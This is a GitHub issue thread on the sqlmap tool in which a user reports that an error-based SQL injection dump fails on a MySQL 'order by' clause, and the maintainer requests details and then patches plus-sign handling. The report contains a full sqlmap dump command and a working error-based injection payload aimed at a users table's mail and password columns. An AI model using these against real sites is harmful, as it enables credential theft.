Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

error-based false #231

Closed
chym opened this issue Nov 2, 2012 · 3 comments
Closed

error-based false #231

chym opened this issue Nov 2, 2012 · 3 comments
Assignees
Milestone

Comments

@chym
Copy link

chym commented Nov 2, 2012

i used sqlmap test sql vulnerable on my site but sqlmap can't dump data

--random-agent -u xyz --data="submits=+ssssss+&username=l*&password=&x=45&y=7" -D ht_db -T en_users -C mail,password --dump --no-cast --hex -v 3

i test with live header on firefox with sqlmap syntax 👍

post : xyz?md=login
data: submits=+ssssss+&username=l' AND (SELECT 9275 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 82,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EBZd'='EBZd&password=&x=35&y=16

and respond :

MySQL Error
Message: MySQL Query Error
SQL: select count(username) as counts from en_users where username='l' AND (SELECT 6076 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 49,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lyfN'='lyfN' and password='d41d8cd98f00b204e9800998ecf8427e' and ch=1
Error: Unknown column 'mail' in 'order clause'
Errno.: 1054

seem "order by" can't use in case , pls fix it

tks

@stamparm
Copy link
Member

stamparm commented Nov 6, 2012

you haven't told if sqlmap can find the SQLi vulnerability in the first place. if yes, then please put the whole injection console output (e.g. parameter ... is vulnerable to....).

also, please don't put live URLs into Issue tickets

@ghost ghost assigned stamparm Nov 6, 2012
@stamparm
Copy link
Member

@chym could you please give more details here (as stated in previous comment)

stamparm added a commit that referenced this issue Nov 14, 2012
@stamparm
Copy link
Member

Plus sign was used here in a special manner (representing space character in url encoded data). Patched now

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants